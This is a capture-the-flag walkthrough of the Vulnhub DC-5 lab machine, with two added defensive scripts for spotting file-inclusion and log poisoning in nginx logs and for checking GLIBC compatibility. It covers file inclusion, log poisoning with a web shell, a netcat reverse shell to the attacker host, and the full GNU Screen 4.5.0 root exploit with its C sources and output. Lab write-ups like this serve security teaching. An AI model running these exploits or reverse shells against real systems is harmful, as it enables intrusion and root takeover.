Vulnhub DC-5 Target Machine Penetration Test

admin · 2025-04-02 00:44:36
鼎新安全
don't give up and don't give in!

DC-5

The walkthrough includes the fix for the "version `GLIBC_2.34' not found" error that appears when using the Screen 4.5.0 exploit PoC.
└─# arp-scan -l | grep 08:00:27:a0
192.168.1.101   08:00:27:a0:90:d4       PCS Systemtechnik GmbH

└─# nmap -Pn -p- -A 192.168.1.101 -o nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 16:10 CST
Nmap scan report for 192.168.1.101
Host is up (0.00027s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          38260/tcp   status
|   100024  1          43672/tcp6  status
|   100024  1          46899/udp6  status
|_  100024  1          48339/udp   status
38260/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:A0:90:D4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.27 ms 192.168.1.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.45 seconds

└─# dirsearch -u http://192.168.1.101
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Vulnhub/DC5/reports/http_192.168.1.101/_25-02-12_16-14-03.txt

Target: http://192.168.1.101/

[16:14:03] Starting:
[16:14:16] 200 -    4KB - /contact.php
[16:14:17] 301 -  184B  - /css  ->  http://192.168.1.101/css/
[16:14:19] 200 -    6KB - /faq.php
# footer.php was found, and its content changes on every refresh; thankyou.php (the page the Contact form on the home page redirects to after submission) also changes on refresh, so an include is very likely
[16:14:20] 200 -   17B  - /footer.php
[16:14:21] 301 -  184B  - /images  ->  http://192.168.1.101/images/
[16:14:21] 403 -  570B  - /images/
[16:14:38] 200 -  852B  - /thankyou.php

Task Completed

Try brute-forcing the name of the include parameter with Burp, using burp.txt from the paramDict project as the wordlist.

The parameter turns out to be file.

First, look at the Nginx configuration:

http://192.168.1.101/thankyou.php?file=/etc/nginx/nginx.conf

Access logging (access_log) and error logging (error_log) are both enabled.

Look at the error log first:

http://192.168.1.101/thankyou.php?file=/var/log/nginx/error.log

It records the Referer header and the requested URL.

Trying to plant the web shell through the browser, you will find that < and > are encoded by the browser.

So send the web shell with Burp instead.

Test that it executes.

Reverse shell

Start the listener first, then send the request from Burp: nc -e /bin/bash 192.168.1.99 8888
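The chain above (a file parameter on thankyou.php used to read nginx.conf and then the nginx log, followed by PHP code planted through a logged header) leaves a distinctive trail in the access log. The script below is an added example, not code from the original article or from the DC-5 box: it parses nginx combined-format lines and flags file-inclusion probes (absolute paths, traversal sequences, reads of anything under /var/log/) as well as PHP open tags appearing in the Referer or User-Agent field. The log lines are constructed; the addresses, page name and the file parameter follow the write-up, while the rule names and the list of sensitive prefixes are my own choices.

```python
"""Flag LFI probing and log-poisoning attempts in nginx access logs.

Added example for this write-up (not code from the original article or
from the DC-5 box). The log lines below are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed nginx "combined" format lines; addresses and paths follow the write-up.
ACCESS_LOG = """\
192.168.1.99 - - [12/Feb/2025:16:30:01 +0800] "GET /thankyou.php HTTP/1.1" 200 852 "-" "Mozilla/5.0"
192.168.1.99 - - [12/Feb/2025:16:31:12 +0800] "GET /thankyou.php?file=/etc/nginx/nginx.conf HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
192.168.1.99 - - [12/Feb/2025:16:32:40 +0800] "GET /thankyou.php?file=/var/log/nginx/error.log HTTP/1.1" 200 40210 "-" "Mozilla/5.0"
192.168.1.99 - - [12/Feb/2025:16:33:05 +0800] "GET /thankyou.php?file=footer.php HTTP/1.1" 200 860 "-" "Mozilla/5.0"
192.168.1.99 - - [12/Feb/2025:16:34:22 +0800] "GET /thankyou.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1920 "-" "Mozilla/5.0"
192.168.1.99 - - [12/Feb/2025:16:35:00 +0800] "GET /nonexistent HTTP/1.1" 404 169 "<?php echo 'poisoned'; ?>" "Mozilla/5.0"
"""

# nginx "combined" log format: ip ident user [time] "request" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r"<\?(?:php|=)", re.IGNORECASE)
SENSITIVE_PREFIXES = ("/etc/", "/proc/", "/root/", "/home/")  # assumed list, extend as needed


def classify_value(value):
    """Return why a query-string value looks like a file-inclusion probe, or None."""
    v = unquote(value)  # parse_qs already decoded once; a second pass catches double encoding
    if "../" in v or "..\\" in v:
        return "path traversal"
    if v.startswith("/var/log/"):
        return "log file read (poisoning chain indicator)"
    if v.startswith(SENSITIVE_PREFIXES):
        return "absolute path read"
    return None


def analyse(log_text):
    """Walk the log and return one finding dict per suspicious parameter or header."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        rec = m.groupdict()
        query = parse_qs(urlsplit(rec["target"]).query, keep_blank_values=True)
        # Any parameter, not only 'file': the parameter name was brute-forced in the write-up.
        for name, values in query.items():
            for value in values:
                reason = classify_value(value)
                if reason:
                    findings.append({"kind": "lfi_probe", "ip": rec["ip"], "time": rec["ts"],
                                     "where": name, "value": unquote(value), "reason": reason})
        # PHP code in a logged header is the write half of log poisoning.
        for header in ("referer", "ua"):
            if PHP_TAG_RE.search(rec[header]):
                findings.append({"kind": "log_poisoning", "ip": rec["ip"], "time": rec["ts"],
                                 "where": header, "value": rec[header],
                                 "reason": "PHP open tag written into the log"})
    return findings


def summary(findings):
    """Count findings per kind, e.g. {'lfi_probe': 3, 'log_poisoning': 1}."""
    counts = {}
    for f in findings:
        counts[f["kind"]] = counts.get(f["kind"], 0) + 1
    return counts


if __name__ == "__main__":
    found = analyse(ACCESS_LOG)
    for f in found:
        print(f"{f['kind']:14} {f['ip']:14} {f['where']}={f['value']!r}  ({f['reason']})")
    print(summary(found))
```

Run stand-alone it prints the findings for the constructed lines; feeding analyse() a real access log works the same way. A read of the nginx log itself followed by a PHP tag in a logged header from the same client is the exact signature of the poisoning used in this box. On the application side the fix is an allowlist of includable files rather than a log rule, and on the server side the log files should not be readable by the account PHP runs as.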

└─# nc -lvvp 8888
listening on [any] 8888 ...
192.168.1.101: inverse host lookup failed: Unknown host
connect to [192.168.1.99] from (UNKNOWN) [192.168.1.101] 36679
whoami
www-data
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@dc-5:~/html$

Privilege escalation

www-data@dc-5:~/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs

exim cannot give full root privileges, so screen is used as the way in.

└─# searchsploit --id screen
----------------------------------------------------------------- ---------
 Exploit Title                                                   |  EDB-ID
----------------------------------------------------------------- ---------
GNU Screen 4.5.0 - Local Privilege Escalation                    | 41154

└─# searchsploit -p 41154
  Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/41154
     Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
    Codes: N/A
 Verified: True
File Type: Bourne-Again shell script, ASCII text executable

┌──(root㉿kali)-[~]
└─# cp /usr/share/exploitdb/exploits/linux/local/41154.sh /root/Vulnhub/DC5/screen.sh

┌──(root㉿kali)-[~]
└─# cd Vulnhub/DC5/

# start an HTTP server
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# python -m http.server 9999
Serving HTTP on 0.0.0.0 port 9999 (http://0.0.0.0:9999/) ...

└─# cat screen.sh
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

Create the files from the script contents:

┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# vim libhax.c
# contents
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# vim rootshell.c
# contents
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

# compile
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# gcc -fPIC -shared -ldl -o libhax.so libhax.c
libhax.c: In function 'dropshell':
libhax.c:7:5: warning: implicit declaration of function 'chmod' [-Wimplicit-function-declaration]
    7 |     chmod("/tmp/rootshell", 04755);
      |     ^~~~~
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# gcc -o rootshell rootshell.c
rootshell.c: In function 'main':
rootshell.c:3:5: warning: implicit declaration of function 'setuid' [-Wimplicit-function-declaration]
    3 |     setuid(0);
      |     ^~~~~~
rootshell.c:4:5: warning: implicit declaration of function 'setgid' [-Wimplicit-function-declaration]
    4 |     setgid(0);
      |     ^~~~~~
rootshell.c:5:5: warning: implicit declaration of function 'seteuid' [-Wimplicit-function-declaration]
    5 |     seteuid(0);
      |     ^~~~~~~
rootshell.c:6:5: warning: implicit declaration of function 'setegid' [-Wimplicit-function-declaration]
    6 |     setegid(0);
      |     ^~~~~~~
rootshell.c:7:5: warning: implicit declaration of function 'execvp' [-Wimplicit-function-declaration]
    7 |     execvp("/bin/sh", NULL, NULL);
      |     ^~~~~~
rootshell.c:7:5: warning: too many arguments to built-in function 'execvp' expecting 2 [-Wbuiltin-declaration-mismatch]
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# ls
arp-scan.txt  libhax.c  libhax.so  nmap.txt  reports  rootshell  rootshell.c  screen.sh
# delete all the .c files
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# rm *.c
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# ls
arp-scan.txt  libhax.so  nmap.txt  reports  rootshell  screen.sh
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# cat -n screen.sh
     1  #!/bin/bash
     2  # screenroot.sh
     3  # setuid screen v4.5.0 local root exploit
     4  # abuses ld.so.preload overwriting to get root.
     5  # bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
     6  # HACK THE PLANET
     7  # ~ infodox (25/1/2017)
     8  echo "~ gnu/screenroot ~"
     9  echo "[+] First, we create our shell and library..."
    10  cat << EOF > /tmp/libhax.c
    11  #include <stdio.h>
    12  #include <sys/types.h>
    13  #include <unistd.h>
    14  __attribute__ ((__constructor__))
    15  void dropshell(void){
    16      chown("/tmp/rootshell", 0, 0);
    17      chmod("/tmp/rootshell", 04755);
    18      unlink("/etc/ld.so.preload");
    19      printf("[+] done!\n");
    20  }
    21  EOF
    22  gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
    23  rm -f /tmp/libhax.c
    24  cat << EOF > /tmp/rootshell.c
    25  #include <stdio.h>
    26  int main(void){
    27      setuid(0);
    28      setgid(0);
    29      seteuid(0);
    30      setegid(0);
    31      execvp("/bin/sh", NULL, NULL);
    32  }
    33  EOF
    34  gcc -o /tmp/rootshell /tmp/rootshell.c
    35  rm -f /tmp/rootshell.c
    36  echo "[+] Now we create our /etc/ld.so.preload file..."
    37  cd /etc
    38  umask 000 # because
    39  screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
    40  echo "[+] Triggering..."
    41  screen -ls # screen itself is setuid, so...
    42  /tmp/rootshell

# delete lines 1-36
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# vim screen.sh
# contents
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

Download the files to /tmp on the target:

www-data@dc-5:/tmp$ wget http://192.168.1.99:9999/screen.sh
wget http://192.168.1.99:9999/screen.sh
converted 'http://192.168.1.99:9999/screen.sh' (ANSI_X3.4-1968) -> 'http://192.168.1.99:9999/screen.sh' (UTF-8)
--2025-02-13 19:44:44--  http://192.168.1.99:9999/screen.sh
Connecting to 192.168.1.99:9999... connected.
HTTP request sent, awaiting response... 200 OK
Length: 190 [text/x-sh]
Saving to: 'screen.sh'

screen.sh           100%[=====================>]     190  --.-KB/s   in 0s

2025-02-13 19:44:44 (44.8 MB/s) - 'screen.sh' saved [190/190]

www-data@dc-5:/tmp$ wget http://192.168.1.99:9999/libhax.so
wget http://192.168.1.99:9999/libhax.so
converted 'http://192.168.1.99:9999/libhax.so' (ANSI_X3.4-1968) -> 'http://192.168.1.99:9999/libhax.so' (UTF-8)
--2025-02-13 19:45:08--  http://192.168.1.99:9999/libhax.so
Connecting to 192.168.1.99:9999... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15528 (15K) [application/octet-stream]
Saving to: 'libhax.so'

libhax.so           100%[=====================>]  15.16K  --.-KB/s   in 0.01s

2025-02-13 19:45:08 (1.51 MB/s) - 'libhax.so' saved [15528/15528]

www-data@dc-5:/tmp$ wget http://192.168.1.99:9999/rootshell
wget http://192.168.1.99:9999/rootshell
converted 'http://192.168.1.99:9999/rootshell' (ANSI_X3.4-1968) -> 'http://192.168.1.99:9999/rootshell' (UTF-8)
--2025-02-13 19:45:17--  http://192.168.1.99:9999/rootshell
Connecting to 192.168.1.99:9999... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16168 (16K) [application/octet-stream]
Saving to: 'rootshell'

rootshell           100%[=====================>]  15.79K  --.-KB/s   in 0s

2025-02-13 19:45:17 (505 MB/s) - 'rootshell' saved [16168/16168]

www-data@dc-5:/tmp$ ls
ls
libhax.so  rootshell  screen.sh

Make the script executable and run it:

www-data@dc-5:/tmp$ chmod 777 screen.sh
chmod 777 screen.sh
www-data@dc-5:/tmp$ ./screen.sh
./screen.sh
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.
/tmp/rootshell: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by /tmp/rootshell)
# Normally this step returns a root shell. The error shows the problem is a version mismatch, and the offending file is rootshell.
www-data@dc-5:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Quoting a passage from another author's article:

The error appears because the GLIBC_2.34 version is not present in the target environment. Because the shell obtained from the reverse connection is awkward to work in, most people compile on their own host and then transfer the finished files into the target environment, which is more convenient. But when rootshell.c is compiled with gcc on your own Kali host, if your host's GLIBC version is relatively high while the DC-5 target's is lower, the error above appears.

Copyright notice: this is the blogger's original article, licensed under the CC 4.0 BY-SA license. When reposting, please include the original source link and this notice. Original link:

https://blog.csdn.net/weixin_73904941/article/details/142856475 

So instead we compile rootshell.c on the target itself.

www-data@dc-5:/tmp$ wget http://192.168.1.99:8888/rootshell.c
wget http://192.168.1.99:8888/rootshell.c
converted 'http://192.168.1.99:8888/rootshell.c' (ANSI_X3.4-1968) -> 'http://192.168.1.99:8888/rootshell.c' (UTF-8)
--2025-02-14 11:46:47--  http://192.168.1.99:8888/rootshell.c
Connecting to 192.168.1.99:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 135 [text/x-csrc]
Saving to: 'rootshell.c'

rootshell.c         100%[=====================>]     135  --.-KB/s   in 0s

2025-02-14 11:46:47 (33.0 MB/s) - 'rootshell.c' saved [135/135]

www-data@dc-5:/tmp$ gcc -o rootshell rootshell.c
gcc -o rootshell rootshell.c
# gcc cannot locate cc1
gcc: error trying to exec 'cc1': execvp: No such file or directory
# check whether it exists on this machine at all
www-data@dc-5:/tmp$ find / -name cc1 2>/dev/null
find / -name cc1 2>/dev/null
/usr/lib/gcc/x86_64-linux-gnu/4.9/cc1
# check whether the gcc install path is in PATH
www-data@dc-5:/tmp$ echo $PATH
echo $PATH
/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.
# add a temporary PATH entry
www-data@dc-5:/tmp$ export PATH="/usr/lib:$PATH"
export PATH="/usr/lib:$PATH"
# it compiles now
www-data@dc-5:/tmp$ gcc -o rootshell rootshell.c
gcc -o rootshell rootshell.c
www-data@dc-5:/tmp$ ls
ls
rootshell  rootshell.c
# try again
www-data@dc-5:/tmp$ ./screen.sh
./screen.sh
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.
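The "version `GLIBC_2.34' not found" error can be predicted before a binary is ever copied anywhere: glibc records, for every imported symbol, the symbol version it was linked against, and a program built on a host with glibc 2.34 or newer references __libc_start_main@GLIBC_2.34 even when its own calls (setuid, execvp) are decades old. The script below is an added example, not code from the original article: it parses the text of `objdump -T <binary>` from the build host and `ldd --version` from the target, and reports which required versions the target cannot satisfy. Both samples are constructed; the target glibc version 2.19 is an assumption (the write-up shows gcc 4.9 but never states the libc version), and for a real check you read that value from the target.

```python
"""Compare the GLIBC symbol versions a binary imports with what a target libc provides.

Added example for this write-up (not from the original article). SAMPLE_OBJDUMP
and SAMPLE_LDD are constructed; the target version 2.19 is an assumption.
"""
import re
import subprocess
import sys

# Constructed `objdump -T rootshell` output as it would look for a binary built on glibc >= 2.34.
SAMPLE_OBJDUMP = """\
rootshell:     file format elf64-x86-64

DYNAMIC SYMBOL TABLE:
0000000000000000  w   D  *UND*  0000000000000000  Base        _ITM_deregisterTMCloneTable
0000000000000000      DF *UND*  0000000000000000 (GLIBC_2.2.5) setgid
0000000000000000      DF *UND*  0000000000000000 (GLIBC_2.2.5) setuid
0000000000000000      DF *UND*  0000000000000000 (GLIBC_2.2.5) seteuid
0000000000000000      DF *UND*  0000000000000000 (GLIBC_2.2.5) setegid
0000000000000000      DF *UND*  0000000000000000 (GLIBC_2.2.5) execvp
0000000000000000      DF *UND*  0000000000000000 (GLIBC_2.34) __libc_start_main
0000000000000000  w   DF *UND*  0000000000000000 (GLIBC_2.2.5) __cxa_finalize
0000000000000000  w   D  *UND*  0000000000000000  Base        __gmon_start__
"""
# Constructed `ldd --version` first line from the target (assumed glibc 2.19).
SAMPLE_LDD = "ldd (Debian GLIBC 2.19-18+deb8u10) 2.19\nCopyright (C) 2014 Free Software Foundation, Inc.\n"

# Undefined (imported) symbol carrying a GLIBC_x.y version, with or without parentheses.
UND_RE = re.compile(r"\*UND\*.*?\(?(GLIBC_(\d+(?:\.\d+)*))\)?\s+(\S+)\s*$")


def parse_version(text):
    """'GLIBC_2.34' or '2.2.5' -> (2, 34) / (2, 2, 5), so versions compare numerically."""
    return tuple(int(part) for part in text.rsplit("_", 1)[-1].split("."))


def required_glibc(objdump_text):
    """Map each GLIBC version the binary imports to the symbols that need it."""
    needed = {}
    for line in objdump_text.splitlines():
        m = UND_RE.search(line)
        if m:
            needed.setdefault(m.group(1), []).append(m.group(3))
    return needed


def target_glibc_from_ldd(ldd_text):
    """Pull the bare version ('2.19') off the first line of `ldd --version`."""
    m = re.search(r"(\d+\.\d+)\s*$", ldd_text.splitlines()[0])
    if not m:
        raise ValueError("unrecognised ldd --version output")
    return m.group(1)


def check_compat(objdump_text, target_glibc):
    """Return (ok, too_new): too_new lists versions the target libc cannot provide."""
    target = parse_version(target_glibc)
    too_new = {ver: syms for ver, syms in required_glibc(objdump_text).items()
               if parse_version(ver) > target}
    return (not too_new, too_new)


if __name__ == "__main__":
    # Usage: script.py [binary] [target_glibc]; with no arguments the constructed samples are used.
    if len(sys.argv) > 1:
        objdump_text = subprocess.run(["objdump", "-T", sys.argv[1]],
                                      capture_output=True, text=True, check=True).stdout
    else:
        objdump_text = SAMPLE_OBJDUMP
    target = sys.argv[2] if len(sys.argv) > 2 else target_glibc_from_ldd(SAMPLE_LDD)
    ok, too_new = check_compat(objdump_text, target)
    print(f"target glibc {target}: {'compatible' if ok else 'INCOMPATIBLE'}")
    for ver, syms in sorted(too_new.items()):
        print(f"  needs {ver} for: {', '.join(syms)}")
```

With the constructed samples it reports GLIBC_2.34 as unsatisfiable because of __libc_start_main, which is exactly the symbol the loader complained about in the transcript. The write-up's remedy is to compile on the target; building with `gcc -static`, or in a container whose glibc matches the target's, avoids the mismatch as well. The same check is useful in the other direction during incident response: the highest GLIBC version a dropped binary imports is a lower bound on the glibc of the machine it was built on, which narrows down the attacker's build environment.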

Flag

# id
id
# privilege escalation to root succeeded!
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# find / -name *flag.*
find / -name *flag.*
/usr/share/man/man3/fegetexceptflag.3.gz
/usr/share/man/man3/fesetexceptflag.3.gz
/root/thisistheflag.txt
# cat /root/thisistheflag.txt
cat /root/thisistheflag.txt
888b    888 d8b                                                      888      888 888 888
8888b   888 Y8P                                                      888      888 888 888
88888b  888                                                          888      888 888 888
888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888
888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888
888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P
888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  "   "   "
888    Y888 888  "Y8888P "Y8888        "Y8888888P" "Y88P"  888     888  888 888 888 888

Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated.  :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.

Summary

Observe and test every page carefully; any one of them may be the way in.

Don't panic when you hit an error; work through it carefully and patiently.

Note: 鼎星安全 reserves the right to modify and interpret this article. Anyone reposting or distributing it must preserve it in full, including the copyright notice and all other content. Without permission it may not be altered, abridged or extended in any way, nor used for commercial purposes by any means.

Originally published on the WeChat public account 鼎新安全: Vulnhub DC-5 Target Machine Penetration Test

Disclaimer: The programs (methods) discussed in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes no legal or joint liability. For any issues, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not intercepted; contact details are on the home page).
When reposting, please keep the link to this article (CN-SEC中文网; thanks to the original author for their work): https://cn-sec.com/archives/3894193.html